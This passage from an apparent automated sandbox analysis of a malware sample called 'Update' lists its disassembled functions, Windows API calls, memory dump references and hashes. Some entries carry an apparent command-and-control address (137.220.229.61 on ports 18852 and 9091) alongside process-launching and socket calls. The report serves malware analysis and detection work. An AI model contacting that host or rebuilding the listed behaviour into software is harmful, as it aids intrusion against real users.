WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000331A
Sleep.KERNEL32(0000012C), ref: 1000332B

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
String ID:
API String ID: 3137405945-0
Opcode ID: 90501a451cf47964b750dce1617d56ac3a73a9eb1c931f81fede124cf76ff774
Instruction ID: f89297930b1253133b9af3f62c08b225611c8876bcc0692efb07df5bac526d50
Opcode Fuzzy Hash: 90501a451cf47964b750dce1617d56ac3a73a9eb1c931f81fede124cf76ff774
Instruction Fuzzy Hash: 65F08971104314AFD610DBE9CCC4D46F3B8AF89331B144709F221872D0CAB1E8018BA0

Function 037F6690 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 037F669B
CoCreateInstance.OLE32(038146FC,00000000,00000001,0381471C,?,?,?,?,?,?,?,?,?,?,037F588A), ref: 037F66B2
SysFreeString.OLEAUT32(?), ref: 037F674C
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,037F588A), ref: 037F677D

Strings

FriendlyName, xrefs: 037F673B

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CreateFreeInitializeInstanceStringUninitialize
String ID: FriendlyName
API String ID: 841178590-3623505368
Opcode ID: ebe239086112dc001acae03d0e763ee8f2a14027d5ef1c9adb4b03345d39a112
Instruction ID: b62ea53d6a380ddfabe3a98aa49bf74580af1d31d38dd36d426bb846d669bbfb
Opcode Fuzzy Hash: ebe239086112dc001acae03d0e763ee8f2a14027d5ef1c9adb4b03345d39a112
Instruction Fuzzy Hash: 4A311975600609AFDB00DA99DC80EAEB7BDEFC9704F148598E615EB354DB71EA01CB60

Function 037FF707 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 037FF721

Part of subcall function 037FF673: __FF_MSGBANNER.LIBCMT ref: 037FF68C
Part of subcall function 037FF673: __NMSG_WRITE.LIBCMT ref: 037FF693
Part of subcall function 037FF673: RtlAllocateHeap.NTDLL(00000000,00000001,74DEDFF0,00000000,00000000,?,03804500,?,74DEDFF0,00000000,?,038081D6,00000000,?,?,?), ref: 037FF6B8

std::exception::exception.LIBCMT ref: 037FF756
std::exception::exception.LIBCMT ref: 037FF770
__CxxThrowException@8.LIBCMT ref: 037FF781

Strings

bad allocation, xrefs: 037FF74F

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: bad allocation
API String ID: 615853336-2104205924
Opcode ID: a04d9f1bbd9b93620257704cda16e87564f0ea9cdf73fafdbd18491a14bd9236
Instruction ID: 82a0c54e9d967fbbabf7c443ebfefc508a4daee99d8d1503f5f3689a1cb0d0f8
Opcode Fuzzy Hash: a04d9f1bbd9b93620257704cda16e87564f0ea9cdf73fafdbd18491a14bd9236
Instruction Fuzzy Hash: B1F0F9799007096ECB00EBA4EC29A9EB76DBB40624F54009DD714DA2D5DF7085048B60

Function 006E1C50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(00000001), ref: 006E1C61
CommandLineToArgvW.SHELL32(00000000), ref: 006E1C68
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,006E0000), ref: 006E1CD3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 006E1CF3
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,006E0000,00000000,00000000,00000000,006E2778,00000014), ref: 006E1D25

Memory Dump Source

Source File: 00000003.00000002.3509326012.00000000006E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.3509290719.00000000006E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509400316.00000000006E3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509430070.00000000006E4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509430070.0000000000726000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_Update.jbxd

Similarity

API ID: ByteCharCommandLineMultiWide$ArgvFreeLocal
String ID:
API String ID: 4060259846-0
Opcode ID: fcc31949c0eb5ef61d54217deff79c3cf15f3bb56fedc6e190c507e4bcede5fd
Instruction ID: 1b4502a34c7f13a6763e7a3898025c74d1c51c4c3b0fcdcb27db144550cf3201
Opcode Fuzzy Hash: fcc31949c0eb5ef61d54217deff79c3cf15f3bb56fedc6e190c507e4bcede5fd
Instruction Fuzzy Hash: A931F070605385ABE710EF299C81B5B77EAEF85710F10092CF959DB2C0E670AD088B62

Function 6CA9D04E Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 6CA9D08B
dllmain_crt_dispatch.LIBCMT ref: 6CA9D0A2
dllmain_raw.LIBCMT ref: 6CA9D0EA
dllmain_crt_dispatch.LIBCMT ref: 6CA9D0FD
dllmain_raw.LIBCMT ref: 6CA9D110

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: c6dec0db1508cfb61d76926ffbb95c5239ea01895004ddf7ce5118b5204e5148
Instruction ID: e06421b222fa10b690bc35732376973a3f4f385824cd5e7b8b812f31bf2c7386
Opcode Fuzzy Hash: c6dec0db1508cfb61d76926ffbb95c5239ea01895004ddf7ce5118b5204e5148
Instruction Fuzzy Hash: 9521F372D21618AFCF118F56CE42AAF3AF8DB80698F144119F8155BA10C3308DC6CBE0

Function 10002D10 Relevance: 7.5, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 10002D3C
CancelIo.KERNEL32(?), ref: 10002D46
InterlockedExchange.KERNEL32(00000000,00000000), ref: 10002D4F
closesocket.WS2_32(?), ref: 10002D59
SetEvent.KERNEL32(00000001), ref: 10002D63

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
String ID:
API String ID: 1486965892-0
Opcode ID: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
Instruction ID: c3dd280d0a222891198d8956340d5cd90ea8efbda93af296f9b36197db09124c
Opcode Fuzzy Hash: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
Instruction Fuzzy Hash: 95F04F75100710EFE320DF94CC89F5677B8FB49B12F148659F6829B690C7B1F9048BA0

Function 6CA9403B Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 181processCOMMON

Download Yara Rule

APIs

WinExec.KERNEL32(00000000,00000000), ref: 6CA9416E

Strings

j)wh, xrefs: 6CA94190
&, xrefs: 6CA94250
', xrefs: 6CA94DC9

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Exec
String ID: &$'$j)wh
API String ID: 459137531-3604346523
Opcode ID: eb1b3bed5f09a56c803aff89e5945ecb2700ec176e371690c35d7a67f8250f6a
Instruction ID: f9612d6249db2381a2c40606b8b534d47b7aca21bf12f9d545992a68089b9755
Opcode Fuzzy Hash: eb1b3bed5f09a56c803aff89e5945ecb2700ec176e371690c35d7a67f8250f6a
Instruction Fuzzy Hash: EF711571C152588FDB14CFA8C9483EEBBF2BF85308F15465CD0246BB91DB755AC88B91

Function 10006F17 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 10006F31

Part of subcall function 10006E83: __FF_MSGBANNER.LIBCMT ref: 10006E9C
Part of subcall function 10006E83: __NMSG_WRITE.LIBCMT ref: 10006EA3
Part of subcall function 10006E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006EC8

std::exception::exception.LIBCMT ref: 10006F66
std::exception::exception.LIBCMT ref: 10006F80
__CxxThrowException@8.LIBCMT ref: 10006F91

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: d1b741ba0380379decb7d1b22a74743c7f5a7046d8fc72408544d039aac17dad
Instruction ID: bc3bc25b656f4220cb3330c80879dd0d2e796a6a37b49e0188f73f67aa49fa4f
Opcode Fuzzy Hash: d1b741ba0380379decb7d1b22a74743c7f5a7046d8fc72408544d039aac17dad
Instruction Fuzzy Hash: C5F02D3980425BAAFB00DBA4DC91AAD3AE7EB496C0F300025F4149E0D5DFB1EBC0C740

Function 6CA96410 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 6CA9642F

Strings

137.220.229.61, xrefs: 6CA964DB, 6CA9651E, 6CA9688A, 6CA968A2, 6CA968E8, 6CA96967, 6CA96975, 6CA96984
18852, xrefs: 6CA9653B, 6CA96584, 6CA968EF, 6CA96907, 6CA9694D, 6CA96954, 6CA96962, 6CA96983

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: _strlen
String ID: 137.220.229.61$18852
API String ID: 4218353326-1703524508
Opcode ID: c2bf5971951960306a452e17c11246b69d0891221bda3418fa054ef513208df7
Instruction ID: 0e717f33d62774a9803fe9875cb5b393520442247822ef2306dd34a57b0c0a09
Opcode Fuzzy Hash: c2bf5971951960306a452e17c11246b69d0891221bda3418fa054ef513208df7
Instruction Fuzzy Hash: 8E4137B19103155FD728AF28E940B96BBE6EF8630CF15092DE0158BB41E735DACE87D1

Function 6CA988B9 Relevance: 4.7, APIs: 3, Instructions: 194sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000BB8), ref: 6CA988BF
_strlen.LIBCMT ref: 6CA988DD
_strlen.LIBCMT ref: 6CA98916

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: _strlen$Sleep
String ID:
API String ID: 2737124692-0
Opcode ID: 8edb03a662ad1b9acc342c924ce49a563f6e6c32bf14beca27e3f02b2b74ac59
Instruction ID: 9cac29b745284b220113db1863642330b20b428bf169c6f9ecc12d94be198e01
Opcode Fuzzy Hash: 8edb03a662ad1b9acc342c924ce49a563f6e6c32bf14beca27e3f02b2b74ac59
Instruction Fuzzy Hash: A5614AB2D212289BDB10CFA8DD417DDBBF2FF45314F15032AE815A7780E7319A8887A1

Function 6CA93D3E Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 115sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA91070: SetFileAttributesA.KERNEL32(?,00000001,?,0000000A,00000000,?,00000022,00000040,00000001), ref: 6CA91124
Part of subcall function 6CA91070: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA9115F

Sleep.KERNEL32(000000C8), ref: 6CA93DFC

Strings

, xrefs: 6CA93E96
jIk, xrefs: 6CA93E27

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: AttributesFileIos_base_dtorSleepstd::ios_base::_
String ID: $jIk
API String ID: 3742752172-1761899760
Opcode ID: 5deccb82259c4d25e19ca9ee29ffa6de5c0bc22815935c28f4261ed7a8b93688
Instruction ID: 147b7565d4d8e279a05017edf029c76cfde1f617ccd690dda74e869f0026e7ec
Opcode Fuzzy Hash: 5deccb82259c4d25e19ca9ee29ffa6de5c0bc22815935c28f4261ed7a8b93688
Instruction Fuzzy Hash: 5B51F2B1D153988FDB11CF68C9417EDBBB2BF59304F158299D84877252EB706AC9CB80

Function 037F3160 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 037F316B
InterlockedExchange.KERNEL32(?,00000001), ref: 037F3183
GetCurrentThreadId.KERNEL32 ref: 037F322F

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CurrentThread$ExchangeInterlocked
String ID:
API String ID: 4033114805-0
Opcode ID: 3df11d8481d12b97ee5d60339034e1f32f4226a4fff9adf8d5ab99c6dca845bb
Instruction ID: 93b5f72637de00d8428485713afa91176b1c9e5b88bec6f2096895473c1d0a22
Opcode Fuzzy Hash: 3df11d8481d12b97ee5d60339034e1f32f4226a4fff9adf8d5ab99c6dca845bb
Instruction Fuzzy Hash: 1931BF78200A02DFEB18EF69C884A66B3E9FF44714B10C56DEA1ACB718D731F841CB90

Function 037F11B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 037F11E9
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 037F1226
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 037F1255

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree__floor_pentium4
String ID:
API String ID: 2605973128-0
Opcode ID: 9e131ded19b06ac7891e92e9c44d53ba28c3be619220bf06103aaa81488ed718
Instruction ID: f1350320c26b1b5718d12ced491dd01297160a4b2170b14c5610f701ca08702b
Opcode Fuzzy Hash: 9e131ded19b06ac7891e92e9c44d53ba28c3be619220bf06103aaa81488ed718
Instruction Fuzzy Hash: E8219D71B00709AFDB14EFAED845B6EFBF8FF40B05F4085A9E959E2740EA30A8108744

Function 100011B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 100011E9
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 10001226
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001255

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: Virtual$AllocFree__floor_pentium4
String ID:
API String ID: 2605973128-0
Opcode ID: 7c8a02711727f2d10f68a554ded2e2394815aae473f82a087a4a6f69535250f3
Instruction ID: 68b1d39f7c788df30121c4cd9fa650265093b70568a06a1b8131812e88253602
Opcode Fuzzy Hash: 7c8a02711727f2d10f68a554ded2e2394815aae473f82a087a4a6f69535250f3
Instruction Fuzzy Hash: EB21D170A00709AFEB14DFA9DC85B9EFBF4FF44745F00C5ADE949E2644EA30A8108790

Function 037F1100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 037F112F
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 037F115F
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 037F1192

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree__floor_pentium4
String ID:
API String ID: 2605973128-0
Opcode ID: 2267aee34ec9df8429baaaf62407a6a709266480570681be556dc84c0d1bba5e
Instruction ID: 7100dc537ca4d90c40b4b4be45f7a61ce153bc4886ae599d104044725b5b74bf
Opcode Fuzzy Hash: 2267aee34ec9df8429baaaf62407a6a709266480570681be556dc84c0d1bba5e
Instruction Fuzzy Hash: 9C119070A00708EFDB10AFA9DC86B6EFBF8FF04705F4085A9EA59E2340E770A9108754

Function 10001100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 1000112F
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 1000115F
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001192

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: Virtual$AllocFree__floor_pentium4
String ID:
API String ID: 2605973128-0
Opcode ID: 9a9a6dbc4d50d479c69aa6d6b662a424f68bc22565965440325d2e32c173b15c
Instruction ID: ccfbffdb8cfccccbf267e057733e19453fb850e329b77576dd89ff791b5dae30
Opcode Fuzzy Hash: 9a9a6dbc4d50d479c69aa6d6b662a424f68bc22565965440325d2e32c173b15c
Instruction Fuzzy Hash: 77119670A00709ABEB14DFA9DC86B9EF7F4FF04745F008569EE59D2240E671A9148750

Function 037F9DE0 Relevance: 4.5, APIs: 3, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 037F9E04
GdipDisposeImage.GDIPLUS(?), ref: 037F9E18
GdipDisposeImage.GDIPLUS(?), ref: 037F9E3B

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Gdip$DisposeImage$BitmapCreateFromStream
String ID:
API String ID: 800915452-0
Opcode ID: 01d4784f96e4544a53a1c4970ebe67b820e7306fd23e9de6fc9a3e6224015d8f
Instruction ID: 40cda12532f2791031dc66dd3096c79a4d35b75b0a5dfa8c1fd96efbfd6a475b
Opcode Fuzzy Hash: 01d4784f96e4544a53a1c4970ebe67b820e7306fd23e9de6fc9a3e6224015d8f
Instruction Fuzzy Hash: 05F0A472900219ABCB10EF94D8448AFF77CFB45615B00458AFE05AB340D7308B15CBD0

Function 037F9AC0 Relevance: 4.5, APIs: 3, Instructions: 36COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0381FB64), ref: 037F9ADC
GdiplusStartup.GDIPLUS(0381FB60,?,?), ref: 037F9B15
LeaveCriticalSection.KERNEL32(0381FB64), ref: 037F9B26

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterGdiplusLeaveStartup
String ID:
API String ID: 389129658-0
Opcode ID: dd9ee6342b95c09c129d7a59fa0ac5f0d1371bb9d42b5a69919f5ead023d156b
Instruction ID: de827799dfa620d3b945eea5acc70aabd0e78af9878034498d425180ec16c205
Opcode Fuzzy Hash: dd9ee6342b95c09c129d7a59fa0ac5f0d1371bb9d42b5a69919f5ead023d156b
Instruction Fuzzy Hash: FFF067719812099FDB10EFE1E86A7EFBBBCF705315F4002D9EB0892241D7BA0158CBA1

Function 6CAB357E Relevance: 4.5, APIs: 3, Instructions: 17fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(6CAA51D8,?,6CAA51D8,?,?,?,0000000F), ref: 6CAB3586
GetLastError.KERNEL32(?,6CAA51D8,?,?,?,0000000F), ref: 6CAB3590
__dosmaperr.LIBCMT ref: 6CAB3597

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: DeleteErrorFileLast__dosmaperr
String ID:
API String ID: 1545401867-0
Opcode ID: 6cad80d4d3e9cb1ac850ac10445ca5edbbde057d6fdd61676c72cbc198e4bd80
Instruction ID: c550ab68f23f98741881b66b3b89c8d980054c943dc531876e428a37641d8c0d
Opcode Fuzzy Hash: 6cad80d4d3e9cb1ac850ac10445ca5edbbde057d6fdd61676c72cbc198e4bd80
Instruction Fuzzy Hash: CBD0C9722092096B8E081AF6AD0C91A3BAC9B863793184765F52DC6590EE32C9A29650

Function 10003200 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 15sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 10003200

Strings

137.220.229.61, xrefs: 1002026C
9091, xrefs: 10020254

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: Sleep
String ID: 137.220.229.61$9091
API String ID: 3472027048-3822757443
Opcode ID: 4513ec0b7f0e3245ec74d41a3833d4d9c4567df1cbadf7205a2421670dd53040
Instruction ID: d4922cd372dd7236031f7b79510b5f56ce2b8beeb54c8bf7640301d5853f9da9
Opcode Fuzzy Hash: 4513ec0b7f0e3245ec74d41a3833d4d9c4567df1cbadf7205a2421670dd53040
Instruction Fuzzy Hash: C9D023F0604871CBE928C500DC5447A7375F7C42513940105FC479B144CB74FC08D550

Function 10007156 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 1000715B

